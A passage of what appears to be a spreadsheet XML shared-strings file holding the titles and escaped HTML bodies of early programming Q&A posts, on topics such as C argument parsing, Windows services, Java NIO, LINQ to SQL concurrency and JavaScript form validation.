    <t xml:space="preserve">&lt;p&gt;Is there a way through code, or through the creation of a setup project (via VS), to create a desktop shortcut &lt;strong&gt;with a keyboard shortcut pre-defined&lt;/strong&gt;?&lt;/p&gt;
&lt;p&gt;&lt;img src="http://img89.imageshack.us/img89/8066/shortcutce8.jpg" alt="alt text" /&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Pass arguments into C program from command line</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I'm in Linux and I want to have a program accept arguments when you execute it from the command line.&lt;/p&gt;
&lt;p&gt;For example, &lt;/p&gt;
&lt;p&gt;&lt;code&gt;./myprogram 42 -b -s&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;So then the program would store that number 42 as an int and execute certain parts of code depending on what arguments it gets like -b or -s.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Need help in login validation using javascript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Please could somebody point me out what is the error here? Using javascript i am validating the user input. When i click the login button without checking the javascript function, it goes to the welcome page. Here is my code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;script type="text/javascript"&amp;gt;  
function validLogin()
{
        if(document.getElementById("txtUserName").value == "")
        {
          alert("Please enter your UserName");
          return false;
        }
        if(document.getElementById("txtPassword").value == "")
        {
          alert("Please enter your Password");
          return false;
        }
}
&amp;lt;/script&amp;gt;
 protected void Page_Load(object sender, EventArgs e)
 {
     BtnLogin.Attributes.Add("onClick","return ValidLogin();");     
 }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>An object reference is required for the nonstatic field, method, or property on a Windows form</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;namespace WindowsApplication1
{       
    public partial class Form1 : Form
    {           
        public Form1()
        {
            InitializeComponent();    
        }    
        private void button1_Click(object sender, EventArgs e)
        {                
            //int[] val ={ 0, 0 };
            int val;
            if (textBox1.Text == "")
            { MessageBox.Show("Input any no"); }
            else
            {
                val = Convert.ToInt32(textBox1.Text);                    
                Thread ot1 = new Thread(new ParameterizedThreadStart(SumData));
                ot1.Start(val);                
                }                  
        }
        private static void ReadData(object state)
        {
            System.Windows.Forms.Application.Run(); 
        }         
        void setTextboxText(int result)
        {
            if (this.InvokeRequired)
            { this.Invoke(new IntDelegate(SetTextboxTextSafe), new object[] { result }); }
            else
            {
                SetTextboxTextSafe(result);
            }    
        }
        void SetTextboxTextSafe(int result)
        {
            label1.Text = result.ToString();
        }            
        private static void SumData(object state)
        {
            int result;
            //int[] icount = (int[])state;
            int icount = (int)state;
            for (int i = icount; i &amp;gt; 0; i--)
            {
                result += i;
                System.Threading.Thread.Sleep(1000);
            }
         setTextboxText(result);                    
        }
        delegate void IntDelegate(int result);
        private void button2_Click(object sender, EventArgs e)
        {
            Application.Exit();
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Could anyone gave me the answer why this error is occuring
An object reference is required for the nonstatic field, method, or property 'WindowsApplication1.Form1.setTextboxText(int)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>create service on windows</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am having trouble starting my service on my pc. My code is based on this article &lt;a href="http://www.gamedev.net/reference/articles/article1899.asp" rel="nofollow"&gt;http://www.gamedev.net/reference/articles/article1899.asp&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;When i call installService from my int main(int argc, char *argv[]), it is registered successfully (i can see it in msconfig and services.msc). However it has not started. I manually start the service via services.msv and i get the error "Error 2: system cannot find the file specified". Why is this? i registered the services no more then a min ago, my external HD is still on (where this is currently stored. i'll move a nondev version to c:/ when its ready) What am i doing wrong and is there another tutorial i can look at (i only found the one linked via google)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#define srvName "MyTestService_01312009"
void installService(char*path)
{
    SC_HANDLE handle = ::OpenSCManager( NULL, NULL, SC_MANAGER_ALL_ACCESS );
    SC_HANDLE service = ::CreateService(
    	handle,
    	srvName,
    	"MyTestService_01312009b",
    	GENERIC_READ | GENERIC_EXECUTE,
    	SERVICE_WIN32_OWN_PROCESS,
    	SERVICE_AUTO_START,
    	SERVICE_ERROR_IGNORE,
    	path,
    	NULL,
    	NULL,
    	NULL,
    	NULL,
    	NULL
    );
}
void uninstallService()
{
    SC_HANDLE handle = ::OpenSCManager( NULL, NULL, SC_MANAGER_ALL_ACCESS );//?
    SC_HANDLE service = ::OpenService( handle, srvName, DELETE );
    if( service != NULL )
    {
    	// remove the service!
    	::DeleteService( service );
    }
}
SERVICE_STATUS_HANDLE hStatus;
SERVICE_STATUS status;
/*
if( ::StartServiceCtrlDispatcher( dispatchTable ) == 0 )
{
    // if this fails, it's probably because someone started us from
    // the command line.  Print a message telling them the "usage"
}
*/
void WINAPI ServiceCtrlHandler( DWORD control )
{
    switch( control )
    {
    case SERVICE_CONTROL_SHUTDOWN:
    case SERVICE_CONTROL_STOP:
        // do shutdown stuff here
        status.dwCurrentState = SERVICE_STOPPED;
        status.dwWin32ExitCode = 0;
        status.dwCheckPoint = 0;
        status.dwWaitHint = 0;
        break;
    case SERVICE_CONTROL_INTERROGATE:
        // just set the current state to whatever it is...
        break;
    }
    ::SetServiceStatus( hStatus, &amp;amp;status );
}
void WINAPI ServiceDispatch( DWORD numArgs, char **args )
{
    // we have to initialize the service-specific stuff
    memset( &amp;amp;status, 0, sizeof(SERVICE_STATUS) );
    status.dwServiceType = SERVICE_WIN32;
    status.dwCurrentState = SERVICE_START_PENDING;
    status.dwControlsAccepted = SERVICE_ACCEPT_STOP;
    hStatus = ::RegisterServiceCtrlHandler( srvName, &amp;amp;ServiceCtrlHandler );
    // more initialization stuff here
    FILE *f = fopen("c:/testSrv.bin", "wb");
    ::SetServiceStatus( hStatus, &amp;amp;status );
}
SERVICE_TABLE_ENTRY dispatchTable[] =
{
    { srvName, &amp;amp;ServiceDispatch },
    { NULL, NULL }
};
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Web services and interface compatibility</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Adding a service reference to a web service (this is all WCF) in Visual Studio produces some generated code including a client-side restatement of the interface being exposed.&lt;/p&gt;
&lt;p&gt;I understand why this interface is generated: you might be consuming a 3rd party service and not have access to the actual interface.&lt;/p&gt;
&lt;p&gt;But I do, and the two are &lt;em&gt;not&lt;/em&gt; assignment compatible even though the transparent proxy does indeed exactly implement the interface to which I want to cast.&lt;/p&gt;
&lt;p&gt;I can use reflection, but that's ugly. Is there some way to defeat this faux type safety and inject metadata to so I can use an interface with a class?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;My specific problem departs from the norm in complicated ways that have to do with a single client that uses some derivatives of a base class directly and uses others remotely via service references. The base class for each server needs to keep references to subscribing clients in a collection for enumeration to notify events, and the problem was type varied due to the use of proxies. &lt;/p&gt;
&lt;p&gt;None of these answers solves my specific problem, yet every single answer was instructive and helpful. I found my own solution (use a dual binding) but I would never have figured it out if you hadn't radically improved my understanding of the whole business.&lt;/p&gt;
&lt;p&gt;Three excellent answers. How to choose just one? I choose the first, because it directly solves the problem I first &lt;em&gt;thought&lt;/em&gt; I had.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Open a new tab in firefox and keep ff in the background</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is the a way to programmatically open a URL in a new tab in firefox without firefox gaining focus?&lt;br&gt;&lt;br&gt;
What I found out so far:&lt;br&gt;&lt;/p&gt;
&lt;ul&gt;&lt;li&gt;&lt;code&gt;firefox -new-window &amp;lt;URL&amp;gt;&lt;/code&gt; lets ff stay in the background, but opens a new window instead of a tab.
&lt;li&gt;&lt;code&gt;firefox -new-tab &amp;lt;URL&amp;gt;&lt;/code&gt; opens &amp;lt;URL&amp;gt; in a new tab but gives focus to ff.
&lt;/ul&gt;
&lt;p&gt;EDIT: What I'm trying to accomplish is making the feed reader plugin in claws mail open stuff in firefox in the background, so that I can go through my feeds and open everything that interests me and actually read all the stuff after that.
Oh and I should probably mention that a linux/gnome-only solution would be fine, too.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>iPhone Development - Keyboard does not automatically adjust when taking input using TextField placed in a TableView</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I just downloaded 2.2.1 and i've seen that my input view does not adjust itself when an input field (NSTextField) is selected. Earlier the view was adjusting itself w.r.t keyboard.&lt;/p&gt;
&lt;p&gt;I was using 2.1. How can i achieve the same effect?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is Django a good choice for a security critical application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is Django a good choice for a security critical application?&lt;/p&gt;
&lt;p&gt;I am asking this because most of the online banking software is built using Java. Is there any real reason for this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Encoding problem using SQLite and WinForms 2.0 C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am developing a WinForms app using .NET 2.0 and am trying to use SQLite as a DB solution. My main problem is that I have trouble seeing data from the DB in the WinForm when the data is in a non english language (in my case greek).&lt;/p&gt;
&lt;p&gt;For db administration purposes I use the &lt;a href="http://sqliteadmin.orbmu2k.de/" rel="nofollow"&gt;SQLite administrator&lt;/a&gt; which has no trouble at all returning data in greek. But when I load the data in a DataGridView in my form, I get those dreaded "missing character" square symbols. &lt;/p&gt;
&lt;p&gt;In order to communicate with the db I use the &lt;a href="http://sqlite.phxsoftware.com/" rel="nofollow"&gt;System.Data.SQLite&lt;/a&gt; solution.&lt;/p&gt;
&lt;p&gt;Is there something I am missing here? I looked for setting the default collation in the database but did not come up with anything, since SQLite does not support collation values like SQL Server (e.g. COLLATE Greek_CI_AS)&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
&lt;p&gt;P.S. I am using SQLite 3 and System.Data.SQLite.dll 1.0.60. The connection string for the test is: 
&lt;code&gt;Data Source=test.db;UseUTF8Encoding=True;&lt;/code&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Pros and cons of MS Ajax vs. jQuery in an ASP.NET MVC app?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Now that RC1 is out I need to decide once and for all whether to use MS Ajax libraries or just jQuery for AJAX requests. The application is a new application. Essentially the way I'll decide is whether or not i get any &lt;strong&gt;significant&lt;/strong&gt; benefit from the Microsoft libraries that I wouldn't get from jQuery. I already HAVE jQuery loading and I am concerned about the extra overhead of file size more than anything.&lt;/p&gt;
&lt;p&gt;As far as I'm aware -- the only benefit really is that there are helpers like &lt;code&gt;Ajax.BeginForm&lt;/code&gt;, but perhaps these will work with jQuery at some point anyway? I was also told today by a government employee friend of mine that MS Ajax library has a LOT of bugs in it - which concerns me.&lt;/p&gt;
&lt;p&gt;With Microsoft now having officially &lt;a href="http://weblogs.asp.net/scottgu/archive/2008/09/28/jquery-and-microsoft.aspx"&gt;befriended jQuery&lt;/a&gt; I wouldn't be too worried about them doing anything in future to leave jQuery in the dust by enhancing their own libraries.&lt;/p&gt;
&lt;p&gt;I really don't know a whole lot about exactly what MS Ajax actually does for me. Are there certain pros and cons. Or is it just 90% bloat to support 'update panel' ?&lt;/p&gt;
&lt;p&gt;I also find it very interesting that the &lt;a href="http://www.manning.com/palermo/"&gt;ASP.NET MVC in Action&lt;/a&gt; book just skips over the MS Ajax libraries and jumps straight into jQuery :&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;In this chapter the reader will
  examine how the ajax technique is
  applied to ASP.NET MVC in a more
  seamless way than with Web Forms. The
  reader will see how to leverage an
  increasingly popular, lightweight
  javascript library called jQuery.&lt;/p&gt;
  &lt;p&gt;(from &lt;a href="http://www.manning.com/palermo/palermo_meapch9_sample.pdf"&gt;free sample&lt;/a&gt; chapter on AJAX)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Would very much appreciate hearing from anyone about their experiences workin with both, expecially on the following additional questions :&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;is it easy to convert code between the two libraries - assuming relatively simple ajax requirements ? &lt;/li&gt;
&lt;li&gt;is debugging notably better or faster in either library&lt;/li&gt;
&lt;li&gt;anybody know how ASP.NET 4.0 is progressing and any announced plans for the AJAX library that might be beneficial to MVC?&lt;/li&gt;
&lt;li&gt;what in a nutshell could MS AJAX do for an MVC app beyond sending requests and sticking the response in a DIV? &lt;/li&gt;
&lt;li&gt;how do i do the equivalent of &lt;code&gt;Ajax.BeginForm(...)&lt;/code&gt; and use jQuery ?&lt;/li&gt;
&lt;li&gt;what was your deal killer one way or the other?&lt;/li&gt;
&lt;li&gt;what are most people out there using?&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>What is the PayPal "amount" format in WPS?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the allowed format for PayPal's Website Payments Standard (WPS) forms in the "amount" field? Must the decimal point be ".", or is it currency-dependant? Must there always be exactly two decimal places, or can there also be three (for currencies that have such small nominations) or none (for currencies that have hyper-inflation)?&lt;/p&gt;
&lt;p&gt;I know that this should be a question for PayPal's documentation/forums, but the first has a vast room for improvement (to say the least) and the second is as speedy as a sleeping snail. I have &lt;a href="http://www.paypaldeveloper.com/pdn/board/message?board.id=basicpayments&amp;amp;message.id=33343" rel="nofollow"&gt;posted a question&lt;/a&gt; there, but I don't expect any replies sooner than about two weeks. Hopefully someone here will have an idea.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Trim string in JavaScript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I trim a string in JavaScript?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java : How to determine the correct charset encoding of a stream</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;With reference to the following thread:
&lt;a href="http://stackoverflow.com/questions/498636/java-app-unable-to-read-iso-8859-1-encoded-file-correctly"&gt;http://stackoverflow.com/questions/498636/java-app-unable-to-read-iso-8859-1-encoded-file-correctly&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;What is the best way to programatically determine the correct charset encoding of an inputstream/file ?&lt;/p&gt;
&lt;p&gt;I have tried using the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  File in =  new File(args[0]);
  InputStreamReader r = new InputStreamReader(new FileInputStream(in));
  System.out.println(r.getEncoding());
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But on a file which I know to be encoded with ISO8859_1 the above code yields ASCII, which is not correct, and does not allow me to correctly render the content of the file back to the console.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java NIO: Sending large messages quickly leads to truncated packets and data loss</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got this nasty problem where sending multiple, large messages in quick succession from a Java (NIO) server (running Linux) to a client will lead to truncated packets.  The messages have to be large and sent very rapidly for the problem to occur.  Here's basically what my code is doing (not actual code, but more-or-less what's happening):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//-- setup stuff: --
Charset charset = Charset.forName("UTF-8");
CharsetEncoder encoder = charset.newEncoder();
String msg = "A very long message (let's say 20KB)...";
//-- inside loop to handle incoming connections: --
ServerSocketChannel ssc = (ServerSocketChannel)key.channel();
SocketChannel sc = ssc.accept();
sc.configureBlocking(false);
sc.socket().setTcpNoDelay(true);
sc.socket().setSendBufferSize(1024*1024);
//-- later, actual sending of messages: --
for (int n=0; n&amp;lt;20; n++){
  ByteBuffer bb = encoder.encode(CharBuffer.wrap(msg+'\0'));
  sc.write(bb);
  bb.rewind();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So, if the packets are long enough and sent as quickly as possible (i.e. in a loop like this with no delay), then on the other end it often comes out something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[COMPLETE PACKET 1]
[COMPLETE PACKET 2]
[COMPLETE PACKET 3]
[START OF PACKET 4][SOME OR ALL OF PACKET 5]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;There is data loss, and the packets start to run together, such that the start of packet 5 (in this example) arrives in the same message as the start of packet 4.  It's not just truncating, its running the messages together.&lt;/p&gt;
&lt;p&gt;I imagine that this is related to the TCP buffer or "window size", or that the server here is just providing data faster than the OS, or network adapter, or something, can handle it.  But how do I check for, and prevent it from happening?  If I reduce the length of message per use of sc.write(), but then increase the repetitions, I'll still run into the same problem.  It seems to simply be an issue with the amount of data in a short amount of time.  I don't see that sc.write() is throwing any exceptions either (I know that in my example above I'm not checking, but have in my tests).&lt;/p&gt;
&lt;p&gt;I'd be happy if I could programmatically check if it is not ready for more data yet, and put in a delay, and wait until it is ready.  I'm also not sure if "sc.socket().setSendBufferSize(1024*1024);" has any effect, or if I'd need to adjust this on the Linux side of things.  Is there a way to really "flush" out a SocketChannel?  As a lame workaround, I could try to explicitly force a complete send of anything that is buffered any time I'm trying to send a message of over 10KB, for example (which is not that often in my application).  But I don't know of any way to force a send of the buffer (or wait until it has sent).  Thanks for any help!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>LINQ to SQL - Update to increment a non-primary-key field - thread-safe</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have two tables (well, two relevant for this question) :&lt;/p&gt;
&lt;p&gt;Bets (holds the bets; Columns : Id, , MessagesPosted, )
Bets_Messages (holds the bets' forum messages; Columns : Id, BetId, )&lt;/p&gt;
&lt;p&gt;When I insert a new BetMessage in Bets_Messages I want to update (increment to be precise) the corresponding field in Bets.&lt;/p&gt;
&lt;p&gt;In pure T-SQL that would be :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;INSERT INTO Bets_Messages (BetId, &amp;lt;bla bla&amp;gt;) VALUES (23, "asfasdfasdf");
UPDATE Bets SET MessagesPosted = MessagesPosted + 1 WHERE Id = 23;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The above code would work wonderful and it is thread safe; If two threads would make DB calls to it (and for the same Bet ofcourse) the MessagesPosted column would increment nicely since the first UPDATE would put at least a ROWLOCK on it practically serializing the UPDATEs.&lt;/p&gt;
&lt;p&gt;However using LINQ to SQL this comes to a more difficult approach: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    public void PostMessage(MyProject.Entities.BetMessage betMessageEntity)
    {
        DatabaseDataContext ctx = GetFreshContext(); // GetFreshContext is a private method that practically initializes a new DataContext
        Bets_Message msg = new Bets_Message(betMessageEntity);
        ctx.Bets_Messages.InsertOnSubmit(msg);
        Bet bet = (from b in ctx.Bets where b.Id == (long)betMessageEntity.BetId select b).Single();
        bet.MessagesPosted++;
        ctx.SubmitChanges();
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Looks nice, huh? Well here's what it will generate : &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;exec sp_executesql N'INSERT INTO [dbo].[Bets_Messages]([ParentMessageId], [BetsId], [UserId], [Subject], [DisplayXml], [Time], [ReplyDepth], [Text])
VALUES (@p0, @p1, @p2, @p3, @p4, @p5, @p6, @p7)
SELECT CONVERT(BigInt,SCOPE_IDENTITY()) AS [value]',N'@p0 bigint,@p1 bigint,@p2 uniqueidentifier,@p3 nvarchar(6),@p4 nvarchar(114),@p5 datetime2(7),@p6 tinyint,@p7 nvarchar(8)',@p0=NULL,@p1=1,@p2='A0D253AF-6261-49AE-8C11-BA6117EF35C7',@p3=N'aaawww',@p4=N'&amp;lt;m ai="a0d253af-6261-49ae-8c11-ba6117ef35c7" a="AndreiR" s="aaawww" t="2009-01-31T18:04:31.282+02:00"&amp;gt;wwwwwaaa&amp;lt;/m&amp;gt;',@p5='2009-01-31 18:04:31.2820000',@p6=0,@p7=N'wwwwwaaa'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(for the BetMessage insert) and for the UPDATE :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;exec sp_executesql N'UPDATE [dbo].[Bets]
SET [MessagesPosted] = @p17
WHERE ([Id] = @p0) AND ([UserId] = @p1) AND ([Bets_CategoriesId] = @p2) AND ([Bets_TypesId] = @p3) AND ([TotalSum] = @p4) AND ([TotalBetters] = @p5) AND ([CreateDate] = @p6) AND ([DeadlineDate] = @p7) AND ([ClosedDate] IS NULL) AND ([Bets_StatusesId] = @p8) AND ([LastBetAdded] IS NULL) AND ([Title] = @p9) AND ([ShortDescription] = @p10) AND ([Description] = @p11) AND ([DescriptionPlainText] = @p12) AND ([Version] = @p13) AND ([ReviewedBy] = @p14) AND ([UrlFragment] = @p15) AND ([MessagesPosted] = @p16) AND ([ClosedBy] IS NULL) AND ([OutcomeNumber] IS NULL)',N'@p0 bigint,@p1 uniqueidentifier,@p2 smallint,@p3 tinyint,@p4 money,@p5 int,@p6 datetime2(7),@p7 datetime2(7),@p8 tinyint,@p9 nvarchar(7),@p10 nvarchar(30),@p11 nvarchar(33),@p12 nvarchar(22),@p13 smallint,@p14 uniqueidentifier,@p15 varchar(7),@p16 int,@p17 int',@p0=1,@p1='A0D253AF-6261-49AE-8C11-BA6117EF35C7',@p2=2,@p3=1,@p4=$0.0000,@p5=0,@p6='2008-12-03 00:00:00',@p7='2008-12-31 00:00:00',@p8=2,@p9=N'Pariu 1',@p10=N'Descriere pariu 1 - text chior',@p11=N'Descriere pe larg 1 - html permis',@p12=N'descriere text chior 1',@p13=1,@p14='A0D253AF-6261-49AE-8C11-BA6117EF35C7',@p15='pariu-1',@p16=18,@p17=19
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem with the T-SQL generated for the UPDATE is that although seems ok as thread-safety it will probably throw an error  in the second thread doing the update on the row instead of waiting for it to finish. Will it?&lt;/p&gt;
&lt;p&gt;Here's why I think this.&lt;/p&gt;
&lt;p&gt;1st thread does this :&lt;/p&gt;
&lt;p&gt;insert the corresponding betMessage,
update the bet row to increment the MessagePosted from 0 to 1&lt;/p&gt;
&lt;p&gt;the 2nd thread will do this:&lt;/p&gt;
&lt;p&gt;insert it's corresponding betMessage,
update the bet row to increment the MessagePosted from 0 to 1 (it was 0 when it read it). However now it is 1 and the WHERE clause will make it not update since the wHERE clause will evaluate to false. 0 row(s) affected will be sent to the LINQ client and that in turn will throw an exception.&lt;/p&gt;
&lt;p&gt;Therefore I will have to write my f*#$ing retry attempt code instead of relying on ROW LOCKs in the SQL Server.&lt;/p&gt;
&lt;p&gt;Is there some decent approach that uses LINQ to SQL and &lt;strong&gt;NOT&lt;/strong&gt; stored procedures, ad-hoc queries and so on?&lt;/p&gt;
&lt;p&gt;Thank you for your patience of reading this long post..&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Javascript DOM - add form element to newly created appendChild?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have two functions to add and remove table rows that contain a form input element. They both work fine, but I have a problem in that I need to show a Remove button input only on subsequently created table rows. My two function are as as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function addRow(table_id){
var clone;
var rows=document.getElementById(table_id).getElementsByTagName('tr');
var index=rows.length;
var tbo=document.getElementById(table_id).getElementsByTagName('tbody')[0];
clone=rows[index-1].cloneNode(true);
tbo.appendChild(clone);
}
function delRow(table_id,button){
var row = button.parentNode.parentNode;
var tbo = document.getElementById(table_id).getElementsByTagName('tbody')[0];   
tbo.removeChild(row);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and the html content is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;form&amp;gt;
&amp;lt;table id="mytab"&amp;gt;
&amp;lt;tr&amp;gt;
&amp;lt;td&amp;gt;Upload File &amp;lt;input type="file" name="uploadfile[]" onchange="addRow('mytab')" /&amp;gt; &amp;lt;input name="del_row" type="button" value="Remove Row" onclick="delRow('mytab',this)"/&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;/tr&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;/form&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am by no means a Javascript expert - more of a newbie - so I'm struggling to come up with a solution.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using WebClient to get Remote Images Produces Grainy GIFs and Can't Handle PNG+BMP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Greetings!&lt;/p&gt;
&lt;p&gt;I'm creating a web form prototype (ImageLaoder.aspx) that will return an image so that it may be used like this simple example other Web Forms/web pages:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;img src="http://www.mydomain.com/ImageLoader.aspx?i=http://images.mydomain.com/img/a.jpg" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So far, it loads JPGs with no problems, however GIFs look "grainy" compared to the orignals and BMPs and PNGs result in the following exception:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;em&gt;System.Runtime.InteropServices.ExternalException: A generic error occurred in GDI+&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;My code thus far looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;protected void Page_Load(object sender, EventArgs e)
{
    string l_filePath = Request.QueryString["i"];
    System.Drawing.Image l_image = GetImage(l_filePath);
    if (l_image != null)
    {
        System.Drawing.Imaging.ImageFormat l_imageFormat = DetermineImageFormat(l_filePath);
        WriteImageAsReponse(l_image, l_imageFormat);
    }
}
private System.Drawing.Image GetImage(string filePath)
{
    WebClient l_WebClient = new WebClient();
    byte[] l_imageBytes = l_WebClient.DownloadData(filePath);
    System.Drawing.Image l_image = null;
    using (MemoryStream l_MemStream = new MemoryStream(l_imageBytes, 0, l_imageBytes.Length))
    {
        l_MemStream.Write(l_imageBytes, 0, l_imageBytes.Length);
        l_image = System.Drawing.Image.FromStream(l_MemStream, true);
        l_MemStream.Close();
    }
    return l_image;
}
private System.Drawing.Imaging.ImageFormat DetermineImageFormat(string filePath)
{
    if (filePath.EndsWith(".jpg", StringComparison.OrdinalIgnoreCase))
        return System.Drawing.Imaging.ImageFormat.Jpeg;
    else if (filePath.EndsWith(".gif", StringComparison.OrdinalIgnoreCase))
        return System.Drawing.Imaging.ImageFormat.Gif;
    else if (filePath.EndsWith(".png", StringComparison.OrdinalIgnoreCase))
        return System.Drawing.Imaging.ImageFormat.Png;
    else
        return System.Drawing.Imaging.ImageFormat.Bmp;
}
private void WriteImageAsReponse(System.Drawing.Image image, System.Drawing.Imaging.ImageFormat imageFormat)
{
    if (image == null)
        return;
    System.Drawing.Bitmap l_outputBitMap = new Bitmap(image);
    if (imageFormat == System.Drawing.Imaging.ImageFormat.Jpeg)
        Response.ContentType = "image/jpg";
    else if (imageFormat == System.Drawing.Imaging.ImageFormat.Gif)
        Response.ContentType = "image/gif";
    else if (imageFormat == System.Drawing.Imaging.ImageFormat.Png)
        Response.ContentType = "image/png";
    else
        Response.ContentType = "image/bmp";
    l_outputBitMap.Save(Response.OutputStream, imageFormat);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any ideas why GIFs are grainy and PNGs and BMPs cause exceptions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>On Linux, is the command-line program mktemp less safe than the C-function mkstemp?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Both operations create an empty file and return the filename but mkstemp leaves the file open in exclusive mode and gives you the handle.  Is there a safety benefit to the C-function?  Does this imply that there is a safety hole in the command-line version?&lt;/p&gt;
&lt;p&gt;As an aside, it is interesting that there are several related functions in the C api on Linux and most of them say "Don't use this function" (or similar) in their man page.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I specify that a list property's contents are xml serialized, but the property itself should not be respresented in the markup?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a class like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[XmlRoot("channel")]
public class Channel
{
   [XmlElement("title")]
   public String Title { get; set; }
   [WhatElseGoesHere]
   [XmlArrayItem("item")]
   public List&amp;lt;Item&amp;gt; Items { get; set; }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My desired output is this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;channel&amp;gt;
   &amp;lt;title&amp;gt;The title&amp;lt;/title&amp;gt;
   &amp;lt;item&amp;gt;{item content}&amp;lt;/item&amp;gt;
   &amp;lt;item&amp;gt;{item content}&amp;lt;/item&amp;gt;
&amp;lt;/channel&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Google-Analytics: How do I add an e-mail link as the final step of a goal?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I send a confirmation link via e-mail (in multiple places) but it seems Analytics doesn't recognize those clicks (given URL is visited) unless the visit immediate. I am guessing the last part is about session expiration.&lt;/p&gt;
&lt;p&gt;How can I define my goal funnel so that confirmation page landings are recognized even after a day or two?&lt;/p&gt;
&lt;p&gt;My confirmation URL is in following format:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;"http://&amp;lt;domain_name&amp;gt;/confirmation/&amp;lt;10_char_hex_confirmation_code&amp;gt;/"
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>SQL Server 2005: Nullable Foreign Key Constraint</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a foreign key constraint between tables Sessions and Users. Specifically, Sessions.UID = Users.ID. Sometimes, I want Sessions.UID to be null. Can this be allowed? Any time I try to do this, I get an FK Constraint Violation.&lt;/p&gt;
&lt;p&gt;Specifically, I'm inserting a row into Sessions via LINQ. I set the Session.User = null; and I get this error: 
&lt;PRE&gt;An attempt was made to remove a relationship between a User and a Session. However, one of the relationship's foreign keys (Session.UID) cannot be set to null.&lt;/PRE&gt;&lt;/p&gt;
